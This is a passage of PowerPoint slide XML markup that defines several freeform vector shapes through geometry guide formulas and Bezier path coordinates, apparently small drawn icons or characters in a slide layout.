                <a:gd name="T11" fmla="*/ 39 h 58"/>
                <a:gd name="T12" fmla="*/ 51 w 66"/>
                <a:gd name="T13" fmla="*/ 24 h 58"/>
                <a:gd name="T14" fmla="*/ 9 w 66"/>
                <a:gd name="T15" fmla="*/ 24 h 58"/>
                <a:gd name="T16" fmla="*/ 9 w 66"/>
                <a:gd name="T17" fmla="*/ 24 h 58"/>
                <a:gd name="T18" fmla="*/ 9 w 66"/>
                <a:gd name="T19" fmla="*/ 23 h 58"/>
                <a:gd name="T20" fmla="*/ 9 w 66"/>
                <a:gd name="T21" fmla="*/ 21 h 58"/>
                <a:gd name="T22" fmla="*/ 20 w 66"/>
                <a:gd name="T23" fmla="*/ 9 h 58"/>
                <a:gd name="T24" fmla="*/ 61 w 66"/>
                <a:gd name="T25" fmla="*/ 9 h 58"/>
                <a:gd name="T26" fmla="*/ 66 w 66"/>
                <a:gd name="T27" fmla="*/ 4 h 58"/>
                <a:gd name="T28" fmla="*/ 66 w 66"/>
                <a:gd name="T29" fmla="*/ 0 h 58"/>
                <a:gd name="T30" fmla="*/ 20 w 66"/>
                <a:gd name="T31" fmla="*/ 0 h 58"/>
                <a:gd name="T32" fmla="*/ 0 w 66"/>
                <a:gd name="T33" fmla="*/ 21 h 58"/>
                <a:gd name="T34" fmla="*/ 9 w 66"/>
                <a:gd name="T35" fmla="*/ 33 h 58"/>
                <a:gd name="T36" fmla="*/ 51 w 66"/>
                <a:gd name="T37" fmla="*/ 33 h 58"/>
                <a:gd name="T38" fmla="*/ 57 w 66"/>
                <a:gd name="T39" fmla="*/ 39 h 58"/>
                <a:gd name="T40" fmla="*/ 57 w 66"/>
                <a:gd name="T41" fmla="*/ 43 h 58"/>
                <a:gd name="T42" fmla="*/ 51 w 66"/>
                <a:gd name="T43" fmla="*/ 49 h 58"/>
                <a:gd name="T44" fmla="*/ 20 w 66"/>
                <a:gd name="T45" fmla="*/ 49 h 58"/>
                <a:gd name="T46" fmla="*/ 9 w 66"/>
                <a:gd name="T47" fmla="*/ 38 h 58"/>
                <a:gd name="T48" fmla="*/ 9 w 66"/>
                <a:gd name="T49" fmla="*/ 33 h 58"/>
                <a:gd name="T50" fmla="*/ 9 w 66"/>
                <a:gd name="T51" fmla="*/ 3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" h="58">
                  <a:moveTo>
                    <a:pt x="0" y="21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49"/>
                    <a:pt x="9" y="58"/>
                    <a:pt x="20" y="58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9" y="58"/>
                    <a:pt x="66" y="51"/>
                    <a:pt x="66" y="43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31"/>
                    <a:pt x="59" y="24"/>
                    <a:pt x="51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14"/>
                    <a:pt x="14" y="9"/>
                    <a:pt x="20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3" y="9"/>
                    <a:pt x="66" y="7"/>
                    <a:pt x="66" y="4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1"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="51" y="33"/>
                    <a:pt x="51" y="33"/>
                    <a:pt x="51" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="54" y="33"/>
                    <a:pt x="57" y="35"/>
                    <a:pt x="57" y="39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57" y="47"/>
                    <a:pt x="54" y="49"/>
                    <a:pt x="5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4" y="49"/>
                    <a:pt x="9" y="44"/>
                    <a:pt x="9" y="3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3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7961629" y="-439346"/>
              <a:ext cx="109819" cy="98136"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 66"/>
                <a:gd name="T1" fmla="*/ 38 h 58"/>
                <a:gd name="T2" fmla="*/ 20 w 66"/>
                <a:gd name="T3" fmla="*/ 58 h 58"/>
                <a:gd name="T4" fmla="*/ 46 w 66"/>
                <a:gd name="T5" fmla="*/ 58 h 58"/>
                <a:gd name="T6" fmla="*/ 66 w 66"/>
                <a:gd name="T7" fmla="*/ 38 h 58"/>
                <a:gd name="T8" fmla="*/ 66 w 66"/>
                <a:gd name="T9" fmla="*/ 21 h 58"/>
                <a:gd name="T10" fmla="*/ 46 w 66"/>
                <a:gd name="T11" fmla="*/ 0 h 58"/>
                <a:gd name="T12" fmla="*/ 20 w 66"/>
                <a:gd name="T13" fmla="*/ 0 h 58"/>
                <a:gd name="T14" fmla="*/ 0 w 66"/>
                <a:gd name="T15" fmla="*/ 21 h 58"/>
                <a:gd name="T16" fmla="*/ 0 w 66"/>
                <a:gd name="T17" fmla="*/ 38 h 58"/>
                <a:gd name="T18" fmla="*/ 9 w 66"/>
                <a:gd name="T19" fmla="*/ 21 h 58"/>
                <a:gd name="T20" fmla="*/ 20 w 66"/>
                <a:gd name="T21" fmla="*/ 9 h 58"/>
                <a:gd name="T22" fmla="*/ 46 w 66"/>
                <a:gd name="T23" fmla="*/ 9 h 58"/>
                <a:gd name="T24" fmla="*/ 57 w 66"/>
                <a:gd name="T25" fmla="*/ 21 h 58"/>
                <a:gd name="T26" fmla="*/ 57 w 66"/>
                <a:gd name="T27" fmla="*/ 38 h 58"/>
                <a:gd name="T28" fmla="*/ 46 w 66"/>
                <a:gd name="T29" fmla="*/ 49 h 58"/>
                <a:gd name="T30" fmla="*/ 20 w 66"/>
                <a:gd name="T31" fmla="*/ 49 h 58"/>
                <a:gd name="T32" fmla="*/ 9 w 66"/>
                <a:gd name="T33" fmla="*/ 38 h 58"/>
                <a:gd name="T34" fmla="*/ 9 w 66"/>
                <a:gd name="T35" fmla="*/ 2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6" h="58">
                  <a:moveTo>
                    <a:pt x="0" y="38"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="49"/>
                    <a:pt x="9" y="58"/>
                    <a:pt x="20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57" y="58"/>
                    <a:pt x="66" y="49"/>
                    <a:pt x="66" y="38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9"/>
                    <a:pt x="57" y="0"/>
                    <a:pt x="4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1"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="38"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="14"/>
                    <a:pt x="14" y="9"/>
                    <a:pt x="20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52" y="9"/>
                    <a:pt x="57" y="14"/>
                    <a:pt x="57" y="21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44"/>
                    <a:pt x="52" y="49"/>
                    <a:pt x="46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4" y="49"/>
                    <a:pt x="9" y="44"/>
                    <a:pt x="9" y="38"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="9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4" name="Freeform 10"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8465550" y="-439346"/>
              <a:ext cx="115271" cy="30376"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 6 w 69"/>
                <a:gd name="T1" fmla="*/ 18 h 18"/>
                <a:gd name="T2" fmla="*/ 13 w 69"/>
                <a:gd name="T3" fmla="*/ 15 h 18"/>
                <a:gd name="T4" fmla="*/ 17 w 69"/>
                <a:gd name="T5" fmla="*/ 11 h 18"/>
                <a:gd name="T6" fmla="*/ 19 w 69"/>
                <a:gd name="T7" fmla="*/ 9 h 18"/>
                <a:gd name="T8" fmla="*/ 26 w 69"/>
                <a:gd name="T9" fmla="*/ 8 h 18"/>
                <a:gd name="T10" fmla="*/ 45 w 69"/>
                <a:gd name="T11" fmla="*/ 8 h 18"/>
                <a:gd name="T12" fmla="*/ 49 w 69"/>
                <a:gd name="T13" fmla="*/ 9 h 18"/>
                <a:gd name="T14" fmla="*/ 52 w 69"/>
                <a:gd name="T15" fmla="*/ 11 h 18"/>
                <a:gd name="T16" fmla="*/ 56 w 69"/>
                <a:gd name="T17" fmla="*/ 15 h 18"/>
                <a:gd name="T18" fmla="*/ 63 w 69"/>
                <a:gd name="T19" fmla="*/ 18 h 18"/>
                <a:gd name="T20" fmla="*/ 68 w 69"/>
                <a:gd name="T21" fmla="*/ 18 h 18"/>
                <a:gd name="T22" fmla="*/ 69 w 69"/>
                <a:gd name="T23" fmla="*/ 18 h 18"/>
                <a:gd name="T24" fmla="*/ 69 w 69"/>
                <a:gd name="T25" fmla="*/ 11 h 18"/>
                <a:gd name="T26" fmla="*/ 68 w 69"/>
                <a:gd name="T27" fmla="*/ 11 h 18"/>
                <a:gd name="T28" fmla="*/ 63 w 69"/>
                <a:gd name="T29" fmla="*/ 11 h 18"/>
                <a:gd name="T30" fmla="*/ 60 w 69"/>
                <a:gd name="T31" fmla="*/ 9 h 18"/>
                <a:gd name="T32" fmla="*/ 57 w 69"/>
                <a:gd name="T33" fmla="*/ 4 h 18"/>
                <a:gd name="T34" fmla="*/ 54 w 69"/>
                <a:gd name="T35" fmla="*/ 2 h 18"/>
                <a:gd name="T36" fmla="*/ 45 w 69"/>
                <a:gd name="T37" fmla="*/ 0 h 18"/>
                <a:gd name="T38" fmla="*/ 22 w 69"/>
                <a:gd name="T39" fmla="*/ 0 h 18"/>
                <a:gd name="T40" fmla="*/ 12 w 69"/>
                <a:gd name="T41" fmla="*/ 4 h 18"/>
                <a:gd name="T42" fmla="*/ 8 w 69"/>
                <a:gd name="T43" fmla="*/ 9 h 18"/>
                <a:gd name="T44" fmla="*/ 1 w 69"/>
                <a:gd name="T45" fmla="*/ 11 h 18"/>
                <a:gd name="T46" fmla="*/ 0 w 69"/>
                <a:gd name="T47" fmla="*/ 11 h 18"/>
                <a:gd name="T48" fmla="*/ 0 w 69"/>
                <a:gd name="T49" fmla="*/ 18 h 18"/>
                <a:gd name="T50" fmla="*/ 1 w 69"/>
                <a:gd name="T51" fmla="*/ 18 h 18"/>
                <a:gd name="T52" fmla="*/ 6 w 69"/>
                <a:gd name="T5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18">
                  <a:moveTo>
                    <a:pt x="6" y="18"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="18"/>
                    <a:pt x="11" y="17"/>
                    <a:pt x="13" y="15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8" y="9"/>
                    <a:pt x="19" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="8"/>
                    <a:pt x="22" y="8"/>
                    <a:pt x="26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6" y="8"/>
                    <a:pt x="48" y="8"/>
                    <a:pt x="49" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="9"/>
                    <a:pt x="51" y="10"/>
                    <a:pt x="52" y="11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8" y="17"/>
                    <a:pt x="60" y="18"/>
                    <a:pt x="63" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="64" y="18"/>
                    <a:pt x="66" y="18"/>
                    <a:pt x="68" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="18"/>
                    <a:pt x="69" y="18"/>
                    <a:pt x="69" y="18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6" y="11"/>
                    <a:pt x="64" y="11"/>
                    <a:pt x="63" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="10"/>
                    <a:pt x="61" y="10"/>
                    <a:pt x="60" y="9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6" y="3"/>
                    <a:pt x="55" y="2"/>
                    <a:pt x="54" y="2"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="52" y="1"/>
                    <a:pt x="49" y="0"/>
                    <a:pt x="45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4" y="2"/>
                    <a:pt x="12" y="4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11"/>
                    <a:pt x="5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3" y="18"/>
                    <a:pt x="4" y="18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5" name="Freeform 11"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8465550" y="-407413"/>
              <a:ext cx="115271" cy="69319"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 38 w 69"/>
                <a:gd name="T1" fmla="*/ 33 h 41"/>
                <a:gd name="T2" fmla="*/ 38 w 69"/>
                <a:gd name="T3" fmla="*/ 23 h 41"/>
                <a:gd name="T4" fmla="*/ 62 w 69"/>
                <a:gd name="T5" fmla="*/ 23 h 41"/>
                <a:gd name="T6" fmla="*/ 67 w 69"/>
                <a:gd name="T7" fmla="*/ 19 h 41"/>
                <a:gd name="T8" fmla="*/ 67 w 69"/>
                <a:gd name="T9" fmla="*/ 15 h 41"/>
                <a:gd name="T10" fmla="*/ 38 w 69"/>
                <a:gd name="T11" fmla="*/ 15 h 41"/>
                <a:gd name="T12" fmla="*/ 38 w 69"/>
                <a:gd name="T13" fmla="*/ 8 h 41"/>
                <a:gd name="T14" fmla="*/ 62 w 69"/>
                <a:gd name="T15" fmla="*/ 8 h 41"/>
                <a:gd name="T16" fmla="*/ 67 w 69"/>
                <a:gd name="T17" fmla="*/ 3 h 41"/>
                <a:gd name="T18" fmla="*/ 67 w 69"/>
                <a:gd name="T19" fmla="*/ 0 h 41"/>
                <a:gd name="T20" fmla="*/ 2 w 69"/>
                <a:gd name="T21" fmla="*/ 0 h 41"/>
                <a:gd name="T22" fmla="*/ 2 w 69"/>
                <a:gd name="T23" fmla="*/ 8 h 41"/>
                <a:gd name="T24" fmla="*/ 30 w 69"/>
                <a:gd name="T25" fmla="*/ 8 h 41"/>
                <a:gd name="T26" fmla="*/ 30 w 69"/>
                <a:gd name="T27" fmla="*/ 15 h 41"/>
                <a:gd name="T28" fmla="*/ 2 w 69"/>
                <a:gd name="T29" fmla="*/ 15 h 41"/>
                <a:gd name="T30" fmla="*/ 2 w 69"/>
                <a:gd name="T31" fmla="*/ 23 h 41"/>
                <a:gd name="T32" fmla="*/ 30 w 69"/>
                <a:gd name="T33" fmla="*/ 23 h 41"/>
                <a:gd name="T34" fmla="*/ 30 w 69"/>
                <a:gd name="T35" fmla="*/ 33 h 41"/>
                <a:gd name="T36" fmla="*/ 0 w 69"/>
                <a:gd name="T37" fmla="*/ 33 h 41"/>
                <a:gd name="T38" fmla="*/ 0 w 69"/>
                <a:gd name="T39" fmla="*/ 41 h 41"/>
                <a:gd name="T40" fmla="*/ 65 w 69"/>
                <a:gd name="T41" fmla="*/ 41 h 41"/>
                <a:gd name="T42" fmla="*/ 69 w 69"/>
                <a:gd name="T43" fmla="*/ 37 h 41"/>
                <a:gd name="T44" fmla="*/ 69 w 69"/>
                <a:gd name="T45" fmla="*/ 33 h 41"/>
                <a:gd name="T46" fmla="*/ 38 w 69"/>
                <a:gd name="T47" fmla="*/ 3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" h="41">
                  <a:moveTo>
                    <a:pt x="38" y="33"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="23"/>
                    <a:pt x="38" y="23"/>
                    <a:pt x="38" y="23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65" y="23"/>
                    <a:pt x="67" y="21"/>
                    <a:pt x="67" y="19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5" y="8"/>
                    <a:pt x="67" y="6"/>
                    <a:pt x="67" y="3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7" y="41"/>
                    <a:pt x="69" y="39"/>
                    <a:pt x="69" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="69" y="33"/>
                    <a:pt x="69" y="33"/>
                    <a:pt x="69" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="38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6" name="Freeform 12"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8339375" y="-439346"/>
              <a:ext cx="112935" cy="27260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 7 w 68"/>
                <a:gd name="T1" fmla="*/ 13 h 16"/>
                <a:gd name="T2" fmla="*/ 8 w 68"/>
                <a:gd name="T3" fmla="*/ 11 h 16"/>
                <a:gd name="T4" fmla="*/ 13 w 68"/>
                <a:gd name="T5" fmla="*/ 10 h 16"/>
                <a:gd name="T6" fmla="*/ 57 w 68"/>
                <a:gd name="T7" fmla="*/ 10 h 16"/>
                <a:gd name="T8" fmla="*/ 60 w 68"/>
                <a:gd name="T9" fmla="*/ 12 h 16"/>
                <a:gd name="T10" fmla="*/ 61 w 68"/>
                <a:gd name="T11" fmla="*/ 13 h 16"/>
                <a:gd name="T12" fmla="*/ 61 w 68"/>
                <a:gd name="T13" fmla="*/ 16 h 16"/>
                <a:gd name="T14" fmla="*/ 68 w 68"/>
                <a:gd name="T15" fmla="*/ 16 h 16"/>
                <a:gd name="T16" fmla="*/ 68 w 68"/>
                <a:gd name="T17" fmla="*/ 12 h 16"/>
                <a:gd name="T18" fmla="*/ 65 w 68"/>
                <a:gd name="T19" fmla="*/ 6 h 16"/>
                <a:gd name="T20" fmla="*/ 57 w 68"/>
                <a:gd name="T21" fmla="*/ 4 h 16"/>
                <a:gd name="T22" fmla="*/ 38 w 68"/>
                <a:gd name="T23" fmla="*/ 4 h 16"/>
                <a:gd name="T24" fmla="*/ 38 w 68"/>
                <a:gd name="T25" fmla="*/ 0 h 16"/>
                <a:gd name="T26" fmla="*/ 30 w 68"/>
                <a:gd name="T27" fmla="*/ 0 h 16"/>
                <a:gd name="T28" fmla="*/ 30 w 68"/>
                <a:gd name="T29" fmla="*/ 4 h 16"/>
                <a:gd name="T30" fmla="*/ 10 w 68"/>
                <a:gd name="T31" fmla="*/ 4 h 16"/>
                <a:gd name="T32" fmla="*/ 3 w 68"/>
                <a:gd name="T33" fmla="*/ 6 h 16"/>
                <a:gd name="T34" fmla="*/ 0 w 68"/>
                <a:gd name="T35" fmla="*/ 12 h 16"/>
                <a:gd name="T36" fmla="*/ 0 w 68"/>
                <a:gd name="T37" fmla="*/ 16 h 16"/>
                <a:gd name="T38" fmla="*/ 7 w 68"/>
                <a:gd name="T39" fmla="*/ 16 h 16"/>
                <a:gd name="T40" fmla="*/ 7 w 68"/>
                <a:gd name="T41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" h="16">
                  <a:moveTo>
                    <a:pt x="7" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="12"/>
                    <a:pt x="8" y="11"/>
                    <a:pt x="8" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="11"/>
                    <a:pt x="11" y="10"/>
                    <a:pt x="13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8" y="10"/>
                    <a:pt x="59" y="11"/>
                    <a:pt x="60" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="12"/>
                    <a:pt x="61" y="13"/>
                    <a:pt x="61" y="13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9"/>
                    <a:pt x="67" y="7"/>
                    <a:pt x="65" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="4"/>
                    <a:pt x="61" y="4"/>
                    <a:pt x="57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7" y="4"/>
                    <a:pt x="5" y="4"/>
                    <a:pt x="3" y="6"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="7"/>
                    <a:pt x="0" y="9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7" y="16"/>
                    <a:pt x="7" y="16"/>
                    <a:pt x="7" y="16"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="7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7" name="Freeform 13"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8339375" y="-410528"/>
              <a:ext cx="112935" cy="70876"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 64 w 68"/>
                <a:gd name="T1" fmla="*/ 36 h 42"/>
                <a:gd name="T2" fmla="*/ 53 w 68"/>
                <a:gd name="T3" fmla="*/ 35 h 42"/>
                <a:gd name="T4" fmla="*/ 43 w 68"/>
                <a:gd name="T5" fmla="*/ 33 h 42"/>
                <a:gd name="T6" fmla="*/ 55 w 68"/>
                <a:gd name="T7" fmla="*/ 29 h 42"/>
                <a:gd name="T8" fmla="*/ 58 w 68"/>
                <a:gd name="T9" fmla="*/ 26 h 42"/>
                <a:gd name="T10" fmla="*/ 62 w 68"/>
                <a:gd name="T11" fmla="*/ 16 h 42"/>
                <a:gd name="T12" fmla="*/ 62 w 68"/>
                <a:gd name="T13" fmla="*/ 12 h 42"/>
                <a:gd name="T14" fmla="*/ 65 w 68"/>
                <a:gd name="T15" fmla="*/ 12 h 42"/>
                <a:gd name="T16" fmla="*/ 68 w 68"/>
                <a:gd name="T17" fmla="*/ 8 h 42"/>
                <a:gd name="T18" fmla="*/ 68 w 68"/>
                <a:gd name="T19" fmla="*/ 5 h 42"/>
                <a:gd name="T20" fmla="*/ 62 w 68"/>
                <a:gd name="T21" fmla="*/ 5 h 42"/>
                <a:gd name="T22" fmla="*/ 62 w 68"/>
                <a:gd name="T23" fmla="*/ 0 h 42"/>
                <a:gd name="T24" fmla="*/ 55 w 68"/>
                <a:gd name="T25" fmla="*/ 0 h 42"/>
                <a:gd name="T26" fmla="*/ 55 w 68"/>
                <a:gd name="T27" fmla="*/ 5 h 42"/>
                <a:gd name="T28" fmla="*/ 13 w 68"/>
                <a:gd name="T29" fmla="*/ 5 h 42"/>
                <a:gd name="T30" fmla="*/ 13 w 68"/>
                <a:gd name="T31" fmla="*/ 0 h 42"/>
                <a:gd name="T32" fmla="*/ 6 w 68"/>
                <a:gd name="T33" fmla="*/ 0 h 42"/>
                <a:gd name="T34" fmla="*/ 6 w 68"/>
                <a:gd name="T35" fmla="*/ 5 h 42"/>
                <a:gd name="T36" fmla="*/ 0 w 68"/>
                <a:gd name="T37" fmla="*/ 5 h 42"/>
                <a:gd name="T38" fmla="*/ 0 w 68"/>
                <a:gd name="T39" fmla="*/ 12 h 42"/>
                <a:gd name="T40" fmla="*/ 6 w 68"/>
                <a:gd name="T41" fmla="*/ 12 h 42"/>
                <a:gd name="T42" fmla="*/ 6 w 68"/>
                <a:gd name="T43" fmla="*/ 18 h 42"/>
                <a:gd name="T44" fmla="*/ 9 w 68"/>
                <a:gd name="T45" fmla="*/ 25 h 42"/>
                <a:gd name="T46" fmla="*/ 16 w 68"/>
                <a:gd name="T47" fmla="*/ 30 h 42"/>
                <a:gd name="T48" fmla="*/ 25 w 68"/>
                <a:gd name="T49" fmla="*/ 33 h 42"/>
                <a:gd name="T50" fmla="*/ 12 w 68"/>
                <a:gd name="T51" fmla="*/ 35 h 42"/>
                <a:gd name="T52" fmla="*/ 0 w 68"/>
                <a:gd name="T53" fmla="*/ 36 h 42"/>
                <a:gd name="T54" fmla="*/ 0 w 68"/>
                <a:gd name="T55" fmla="*/ 36 h 42"/>
                <a:gd name="T56" fmla="*/ 0 w 68"/>
                <a:gd name="T57" fmla="*/ 42 h 42"/>
                <a:gd name="T58" fmla="*/ 0 w 68"/>
                <a:gd name="T59" fmla="*/ 42 h 42"/>
                <a:gd name="T60" fmla="*/ 27 w 68"/>
                <a:gd name="T61" fmla="*/ 39 h 42"/>
                <a:gd name="T62" fmla="*/ 34 w 68"/>
                <a:gd name="T63" fmla="*/ 37 h 42"/>
                <a:gd name="T64" fmla="*/ 41 w 68"/>
                <a:gd name="T65" fmla="*/ 39 h 42"/>
                <a:gd name="T66" fmla="*/ 54 w 68"/>
                <a:gd name="T67" fmla="*/ 42 h 42"/>
                <a:gd name="T68" fmla="*/ 68 w 68"/>
                <a:gd name="T69" fmla="*/ 42 h 42"/>
                <a:gd name="T70" fmla="*/ 68 w 68"/>
                <a:gd name="T71" fmla="*/ 42 h 42"/>
                <a:gd name="T72" fmla="*/ 68 w 68"/>
                <a:gd name="T73" fmla="*/ 36 h 42"/>
                <a:gd name="T74" fmla="*/ 68 w 68"/>
                <a:gd name="T75" fmla="*/ 36 h 42"/>
                <a:gd name="T76" fmla="*/ 64 w 68"/>
                <a:gd name="T77" fmla="*/ 36 h 42"/>
                <a:gd name="T78" fmla="*/ 55 w 68"/>
                <a:gd name="T79" fmla="*/ 16 h 42"/>
                <a:gd name="T80" fmla="*/ 49 w 68"/>
                <a:gd name="T81" fmla="*/ 24 h 42"/>
                <a:gd name="T82" fmla="*/ 34 w 68"/>
                <a:gd name="T83" fmla="*/ 30 h 42"/>
                <a:gd name="T84" fmla="*/ 19 w 68"/>
                <a:gd name="T85" fmla="*/ 24 h 42"/>
                <a:gd name="T86" fmla="*/ 15 w 68"/>
                <a:gd name="T87" fmla="*/ 21 h 42"/>
                <a:gd name="T88" fmla="*/ 14 w 68"/>
                <a:gd name="T89" fmla="*/ 17 h 42"/>
                <a:gd name="T90" fmla="*/ 13 w 68"/>
                <a:gd name="T91" fmla="*/ 12 h 42"/>
                <a:gd name="T92" fmla="*/ 55 w 68"/>
                <a:gd name="T93" fmla="*/ 12 h 42"/>
                <a:gd name="T94" fmla="*/ 55 w 68"/>
                <a:gd name="T95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8" h="42">
                  <a:moveTo>
                    <a:pt x="64" y="36"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="59" y="36"/>
                    <a:pt x="56" y="35"/>
                    <a:pt x="53" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="35"/>
                    <a:pt x="47" y="34"/>
                    <a:pt x="43" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="30"/>
                    <a:pt x="54" y="29"/>
                    <a:pt x="55" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="56" y="28"/>
                    <a:pt x="57" y="27"/>
                    <a:pt x="58" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="24"/>
                    <a:pt x="62" y="21"/>
                    <a:pt x="62" y="16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7" y="12"/>
                    <a:pt x="68" y="10"/>
                    <a:pt x="68" y="8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21"/>
                    <a:pt x="7" y="24"/>
                    <a:pt x="9" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="27"/>
                    <a:pt x="14" y="29"/>
                    <a:pt x="16" y="30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1" y="34"/>
                    <a:pt x="17" y="35"/>
                    <a:pt x="12" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="35"/>
                    <a:pt x="5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2" y="42"/>
                    <a:pt x="21" y="41"/>
                    <a:pt x="27" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="39"/>
                    <a:pt x="31" y="38"/>
                    <a:pt x="34" y="37"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="38"/>
                    <a:pt x="39" y="39"/>
                    <a:pt x="41" y="39"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="40"/>
                    <a:pt x="49" y="41"/>
                    <a:pt x="54" y="42"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="42"/>
                    <a:pt x="63" y="42"/>
                    <a:pt x="68" y="42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66" y="36"/>
                    <a:pt x="64" y="36"/>
                    <a:pt x="64" y="36"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="55" y="16"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="20"/>
                    <a:pt x="53" y="22"/>
                    <a:pt x="49" y="24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7" y="23"/>
                    <a:pt x="16" y="22"/>
                    <a:pt x="15" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="20"/>
                    <a:pt x="14" y="19"/>
                    <a:pt x="14" y="17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55" y="12"/>
                    <a:pt x="55" y="12"/>
                    <a:pt x="55" y="12"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="55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8" name="Freeform 14"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8081573" y="-437788"/>
              <a:ext cx="56078" cy="98136"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 34"/>
                <a:gd name="T1" fmla="*/ 7 h 58"/>
                <a:gd name="T2" fmla="*/ 14 w 34"/>
                <a:gd name="T3" fmla="*/ 7 h 58"/>
                <a:gd name="T4" fmla="*/ 14 w 34"/>
                <a:gd name="T5" fmla="*/ 51 h 58"/>
                <a:gd name="T6" fmla="*/ 9 w 34"/>
                <a:gd name="T7" fmla="*/ 51 h 58"/>
                <a:gd name="T8" fmla="*/ 9 w 34"/>
                <a:gd name="T9" fmla="*/ 15 h 58"/>
                <a:gd name="T10" fmla="*/ 2 w 34"/>
                <a:gd name="T11" fmla="*/ 15 h 58"/>
                <a:gd name="T12" fmla="*/ 2 w 34"/>
                <a:gd name="T13" fmla="*/ 51 h 58"/>
                <a:gd name="T14" fmla="*/ 0 w 34"/>
                <a:gd name="T15" fmla="*/ 51 h 58"/>
                <a:gd name="T16" fmla="*/ 0 w 34"/>
                <a:gd name="T17" fmla="*/ 58 h 58"/>
                <a:gd name="T18" fmla="*/ 27 w 34"/>
                <a:gd name="T19" fmla="*/ 58 h 58"/>
                <a:gd name="T20" fmla="*/ 34 w 34"/>
                <a:gd name="T21" fmla="*/ 51 h 58"/>
                <a:gd name="T22" fmla="*/ 34 w 34"/>
                <a:gd name="T23" fmla="*/ 51 h 58"/>
                <a:gd name="T24" fmla="*/ 21 w 34"/>
                <a:gd name="T25" fmla="*/ 51 h 58"/>
                <a:gd name="T26" fmla="*/ 21 w 34"/>
                <a:gd name="T27" fmla="*/ 29 h 58"/>
                <a:gd name="T28" fmla="*/ 34 w 34"/>
                <a:gd name="T29" fmla="*/ 29 h 58"/>
                <a:gd name="T30" fmla="*/ 34 w 34"/>
                <a:gd name="T31" fmla="*/ 22 h 58"/>
                <a:gd name="T32" fmla="*/ 21 w 34"/>
                <a:gd name="T33" fmla="*/ 22 h 58"/>
